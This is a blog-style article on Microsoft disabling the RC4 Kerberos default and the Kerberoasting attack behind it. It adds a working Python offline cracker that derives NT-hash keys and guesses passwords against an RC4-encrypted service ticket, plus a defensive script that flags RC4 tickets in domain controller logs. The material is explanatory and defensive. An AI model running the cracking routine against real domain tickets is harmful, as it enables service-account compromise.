Microsoft Finally Kills Off a 26-Year-Old Security Nightmare


According to Ars Technica, Microsoft is finally retiring the obsolete and vulnerable RC4 cipher that Windows has supported by default for 26 years. The company announced it will change domain controller defaults by mid-2026 so that the Kerberos KDC issues only the AES-based encryption types (AES-SHA1), with RC4 disabled unless an admin explicitly configures it. This move comes after more than a decade of damaging intrusions that exploited RC4, including last year’s breach of health giant Ascension, which disrupted 140 hospitals and compromised 5.6 million patient records. US Senator Ron Wyden even called for an FTC investigation into Microsoft’s “gross cybersecurity negligence” over its continued default support. The attack that made that default so costly, known as Kerberoasting since 2014, exploits how RC4 keys are derived in Active Directory’s Kerberos implementation. Microsoft is now providing tools to help admins identify legacy systems that might still rely on the cipher before the change takes effect.


Why This Took So Damn Long

Here’s the thing that gets me. We’ve known RC4 was broken since 1994, more than 30 years ago. So why is Microsoft only fixing the default now, in 2025? The answer, straight from a Microsoft engineer on Bluesky, is a classic tale of legacy tech debt. Steve Syfuhs from the Windows Authentication team explained it’s “hard to kill off a cryptographic algorithm that is present in every OS that’s shipped for the last 25 years.” The problem wasn’t just that the algorithm existed, but the tangled, 20-year-old rules governing when it was chosen. They found vulnerabilities that needed “surgical” fixes and had to delay their original deprecation plans. Basically, it was a mess buried deep in the codebase. But they made some tweaks that quietly made AES the preferred choice, and RC4 usage plummeted. Once they saw it was “basically nil,” they had the confidence to pull the plug for real. It’s a lesson in how hard it is to clean up a foundational mistake, even for a giant like Microsoft.

The Real-World Havoc

Let’s talk about the human cost. This isn’t a theoretical weakness. The article points to the Ascension breach as a direct result. Think about that: 140 hospitals facing life-threatening disruptions because of a stream cipher designed in 1987. Kerberoasting works so well against RC4 because of how Active Directory derives the RC4 Kerberos key: it is simply the account’s NT hash, a single MD4 pass over the UTF-16 password with no salt and no iteration. Any domain user can request a service ticket for a service account and receive a blob encrypted under that key, then test candidate passwords offline at the cost of one MD4 per guess, with no further contact with the domain controller and no lockout. The AES-SHA1 types instead derive their keys with PBKDF2 over a per-account salt and 4096 iterations, which the article puts at roughly 1,000 times more expensive per guess. That’s not a minor upgrade; it’s the difference between a locked door and a screen door. For organizations running critical infrastructure, from hospitals to plant floors where operational technology (OT) must stay up, leaving a protocol like this enabled by default is an unacceptable risk.
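The key derivation described above, carried through to an actual offline guess loop, as an added example that is not code from the article or from Microsoft. It implements the etype 23 (RC4-HMAC) string-to-key and ticket encryption from RFC 4757 and the PBKDF2 stage of the etype 18 (AES256) string-to-key from RFC 3962, then "roasts" a constructed service ticket with a small wordlist. The realm CORP.EXAMPLE, the accounts svc-sql and svc-web, the passwords and the ticket body are all made up; the ticket is a stand-in byte string rather than real ASN.1, and the AES side stops before the final DK() step, which is a fixed AES transform that adds nothing to the per-guess cost.

```python
"""Kerberoasting an RC4-HMAC ticket end to end, stdlib only. Added example,
not code from the original article or from Microsoft.

etype 23 (RC4-HMAC) keys are MD4(UTF-16LE(password)), the NT hash: no salt,
no iterations (RFC 4757). etype 18 (AES256-CTS-HMAC-SHA1-96) keys come from
PBKDF2-HMAC-SHA1 with salt REALM + principal and 4096 iterations (RFC 3962);
only that stage is shown, since the final DK() step is one fixed AES transform
that adds no per-guess cost. MD4 is inline because OpenSSL 3 builds usually
disable it. Realm, account names, passwords and ticket bytes are constructed.
"""
import hashlib
import hmac
import os
import struct

MASK32 = 0xFFFFFFFF
TGS_REP_USAGE = 2  # key usage number for the ticket enc-part (RFC 4120)

def md4(message: bytes) -> bytes:
    """MD4 per RFC 1320: three 16-step rounds per 512-bit block."""
    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z
    def rotl(x, n): return ((x << n) | (x >> (32 - n))) & MASK32
    padded = message + b"\x80"
    padded += b"\x00" * ((56 - len(padded) % 64) % 64)
    padded += struct.pack("<Q", len(message) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(padded), 64):
        x = struct.unpack("<16I", padded[off:off + 64])
        a, b, c, d = state
        for i in range(16):  # round 1, words in order
            a = rotl((a + f(b, c, d) + x[i]) & MASK32, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2, words 0,4,8,12,1,5,...
            k = (i % 4) * 4 + i // 4
            a = rotl((a + g(b, c, d) + x[k] + 0x5A827999) & MASK32, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i, k in enumerate((0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)):
            a = rotl((a + h(b, c, d) + x[k] + 0x6ED9EBA1) & MASK32, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        state = [(s + v) & MASK32 for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)

def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 keystream XOR (KSA then PRGA); the cipher behind etype 23."""
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def nt_hash(password: str) -> bytes:
    """etype 23 string-to-key: one unsalted MD4 over the UTF-16LE password."""
    return md4(password.encode("utf-16-le"))

def aes256_pbkdf2_stage(password: str, realm: str, principal: str) -> bytes:
    """etype 18 string-to-key up to PBKDF2. Salt REALM + sAMAccountName is the
    default for ordinary AD user accounts (assumed for the demo accounts)."""
    salt = (realm.upper() + principal).encode("utf-8")
    return hashlib.pbkdf2_hmac("sha1", password.encode("utf-8"), salt, 4096, 32)

def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes) -> bytes:
    """RFC 4757 section 6: checksum || RC4(K3, confounder || plaintext)."""
    k1 = hmac.new(key, struct.pack("<I", usage), "md5").digest()
    confounder = os.urandom(8)
    checksum = hmac.new(k1, confounder + plaintext, "md5").digest()
    k3 = hmac.new(k1, checksum, "md5").digest()
    return checksum + rc4(k3, confounder + plaintext)

def rc4_hmac_try_key(key: bytes, usage: int, edata: bytes):
    """Decrypt and verify; None on a wrong key. This is the per-candidate
    check a Kerberoast cracker runs against a captured TGS-REP."""
    k1 = hmac.new(key, struct.pack("<I", usage), "md5").digest()
    checksum, body = edata[:16], edata[16:]
    plain = rc4(hmac.new(k1, checksum, "md5").digest(), body)
    if not hmac.compare_digest(hmac.new(k1, plain, "md5").digest(), checksum):
        return None
    return plain[8:]  # drop the 8-byte confounder

def kerberoast(edata: bytes, wordlist) -> tuple:
    """Offline guessing: one MD4, two HMAC-MD5 and one RC4 per candidate.
    Returns (password or None, candidates tried)."""
    for n, guess in enumerate(wordlist, 1):
        if rc4_hmac_try_key(nt_hash(guess), TGS_REP_USAGE, edata) is not None:
            return guess, n
    return None, len(wordlist)

def demo() -> dict:
    """Constructed: svc-sql has a guessable password and the KDC issued it an
    RC4 ticket. nt_hash() takes no account or realm input, so one password maps
    to one key everywhere; the salted AES stage differs per account."""
    secret = "Winter2025!"
    edata = rc4_hmac_encrypt(nt_hash(secret), TGS_REP_USAGE, b"EncTicketPart stand-in")
    found, tries = kerberoast(edata, ["Password1", "Summer2025!", "Welcome1", secret])
    aes_sql = aes256_pbkdf2_stage(secret, "CORP.EXAMPLE", "svc-sql")
    aes_web = aes256_pbkdf2_stage(secret, "CORP.EXAMPLE", "svc-web")
    return {"password": found, "guesses": tries, "aes_keys_equal": aes_sql == aes_web}
```

The check in rc4_hmac_try_key is the same one hashcat's etype 23 TGS-REP mode performs, just in Python: the only expensive part per candidate is the MD4, and because nt_hash() never sees the realm or account name, a table of NT hashes computed once serves every account in every domain. Against an AES ticket each candidate instead costs 4096 HMAC-SHA1 iterations over an account-specific salt, so the same wordlist has to be re-hashed for every account it is tried against.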

What Admins Need to Do Now

So, the deadline is mid-2026. That seems far off, but it’s not. The crucial work starts now. Once the default changes, domain controllers will stop issuing RC4-encrypted tickets unless an account or the domain has been explicitly configured to allow them. If you have some ancient, forgotten legacy system (a third-party appliance, an old line-of-business app, a service account whose password was last set before the domain supported AES) that can only authenticate with RC4, it is going to break. These things are always hiding in the shadows, running some “crucial” function everyone forgot about. Microsoft is offering tools, like updated KDC logs and PowerShell scripts, to hunt them down. The advice is simple: audit your domain controllers. Enable Kerberos auditing and look for TGT and service-ticket events (4768 and 4769) whose Ticket Encryption Type is 0x17, the code for RC4-HMAC. Find them, then build a migration plan to AES: set the AES flags in msDS-SupportedEncryptionTypes (Set-ADUser with -KerberosEncryptionType AES128,AES256) and reset the account’s password afterwards, because AES keys only get generated when the password is set. Explicitly configuring that one stubborn account for RC4 is possible, but it’s a band-aid that keeps the Kerberoasting exposure alive. The goal is to avoid a nasty surprise in mid-2026 when a critical process suddenly stops because its 1990s-era handshake no longer works.
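One way to do that audit offline, as an added example that is not one of Microsoft’s scripts: export the 4768/4769 events from a domain controller to XML and run the logic below over them. It buckets the RC4 hits into accounts whose own TGT is RC4 (the account or its client cannot do AES), services whose tickets are RC4 (the service account has no AES keys, or the client asked for RC4), and the Kerberoasting signature of an RC4 service ticket handed to a client that had already obtained an AES TGT. The five events embedded in the block are constructed stand-ins; the hostnames, accounts, SIDs-free field set, addresses and times are made up, and the export is wrapped in one root element so an XML parser accepts it.

```python
"""Find Kerberos tickets issued with RC4 (etype 0x17) in an exported DC log.

Added example, not one of Microsoft's scripts. Input is the XML that
  wevtutil qe Security /q:"*[System[(EventID=4768 or EventID=4769)]]" /f:xml
prints on a domain controller, wrapped in one root element. The events below
are constructed stand-ins (names, addresses and times are made up) that carry
only the EventData fields this audit reads; a real export has more.
"""
import xml.etree.ElementTree as ET
from collections import Counter

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
RC4_CODES = {"0x17", "0x18"}  # RC4-HMAC, RC4-HMAC-EXP
AES_CODES = {"0x11", "0x12"}  # AES128-, AES256-CTS-HMAC-SHA1-96

_EVENT = ('<Event xmlns="{ns}"><System><EventID>{id}</EventID>'
          '<TimeCreated SystemTime="{t}"/><Computer>DC01.corp.example</Computer>'
          '</System><EventData><Data Name="TargetUserName">{user}</Data>'
          '<Data Name="TargetDomainName">CORP.EXAMPLE</Data>'
          '<Data Name="ServiceName">{svc}</Data>'
          '<Data Name="TicketEncryptionType">{et}</Data>'
          '<Data Name="IpAddress">{ip}</Data><Data Name="Status">{st}</Data>'
          '</EventData></Event>')

# Constructed sample export: alice gets an AES TGT, then an RC4 service ticket
# for svc-sql (Kerberoast pattern or svc-sql lacks AES keys); legacy-scanner$
# can only get an RC4 TGT; bob also gets RC4 for svc-sql from a host with no
# TGT in the export; one AES service ticket for contrast.
SAMPLE_EXPORT = "<Events>" + "".join(_EVENT.format(ns=NS["e"], **e) for e in (
    dict(id=4768, t="2025-11-03T09:12:40Z", user="alice", svc="krbtgt",
         et="0x12", ip="::ffff:10.0.5.23", st="0x0"),
    dict(id=4769, t="2025-11-03T09:12:41Z", user="alice@CORP.EXAMPLE", svc="svc-sql",
         et="0x17", ip="::ffff:10.0.5.23", st="0x0"),
    dict(id=4768, t="2025-11-03T09:13:02Z", user="legacy-scanner$", svc="krbtgt",
         et="0x17", ip="::ffff:10.0.7.40", st="0x0"),
    dict(id=4769, t="2025-11-03T09:13:05Z", user="alice@CORP.EXAMPLE", svc="DC01$",
         et="0x12", ip="::ffff:10.0.5.23", st="0x0"),
    dict(id=4769, t="2025-11-03T09:14:11Z", user="bob@CORP.EXAMPLE", svc="svc-sql",
         et="0x17", ip="::ffff:10.0.9.9", st="0x0"),
)) + "</Events>"

def parse_events(xml_text: str) -> list:
    """Flatten each <Event> into a dict of the fields the audit needs."""
    events = []
    for ev in ET.fromstring(xml_text).iter("{%s}Event" % NS["e"]):
        data = {d.get("Name"): (d.text or "")
                for d in ev.findall("e:EventData/e:Data", NS)}
        events.append({
            "id": int(ev.find("e:System/e:EventID", NS).text),
            "time": ev.find("e:System/e:TimeCreated", NS).get("SystemTime"),
            "dc": ev.find("e:System/e:Computer", NS).text,
            "user": data.get("TargetUserName", ""),
            "service": data.get("ServiceName", ""),
            "etype": data.get("TicketEncryptionType", "").lower(),
            "ip": data.get("IpAddress", ""),
            "status": data.get("Status", ""),
        })
    return events

def rc4_audit(events: list) -> dict:
    """Bucket successful RC4 issuances by what they imply for migration."""
    ok = [e for e in events if e["status"] == "0x0"]
    aes_clients = {e["ip"] for e in ok if e["id"] == 4768 and e["etype"] in AES_CODES}
    rc4_tgts = Counter(e["user"] for e in ok
                       if e["id"] == 4768 and e["etype"] in RC4_CODES)
    rc4_svc = Counter(e["service"] for e in ok
                      if e["id"] == 4769 and e["etype"] in RC4_CODES)
    # An RC4 service ticket for a client that already holds an AES TGT means the
    # client deliberately asked for RC4 (Kerberoasting) or the service account
    # has no AES keys; either way the account needs attention before mid-2026.
    suspicious = [(e["user"], e["service"], e["ip"]) for e in ok
                  if e["id"] == 4769 and e["etype"] in RC4_CODES
                  and e["ip"] in aes_clients]
    return {"rc4_tgts_by_account": rc4_tgts,
            "rc4_tickets_by_service": rc4_svc,
            "aes_capable_client_got_rc4": suspicious}

if __name__ == "__main__":
    for bucket, hits in rc4_audit(parse_events(SAMPLE_EXPORT)).items():
        print(bucket, dict(hits) if isinstance(hits, Counter) else hits)
```

The events only exist if the DCs have success auditing enabled for the "Audit Kerberos Authentication Service" and "Audit Kerberos Service Ticket Operations" subcategories, so check that before trusting an empty result. Each service account that shows up under rc4_tickets_by_service should be cross-checked against its msDS-SupportedEncryptionTypes attribute: if the AES bits are missing, set them and reset the password so the KDC actually holds AES keys; if they are present, the RC4 request came from the client side and is worth a closer look.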

A Broader Security Wake-Up Call

This whole saga is a microcosm of the tech industry’s biggest challenge: sunsetting dangerous legacy tech. RC4 lingered in TLS for years too before it was formally prohibited. It’s everywhere. And it shows how public pressure, like Senator Wyden’s call for an FTC investigation, can actually force change. But should it take a US senator and a massive hospital breach to get a 26-year-old default fixed? I don’t think so. The good news is that once Microsoft finally focused on it, they saw usage drop “orders of magnitude.” That tells us most of the modern world had already moved on. The risk now is in those forgotten corners. For any security pro, this is a perfect reminder. You can’t assume defaults are safe. You have to dig, audit, and understand the vintage of the protocols running your core services. Because the attackers definitely do, and they’re counting on you to overlook that one ancient, broken cipher.
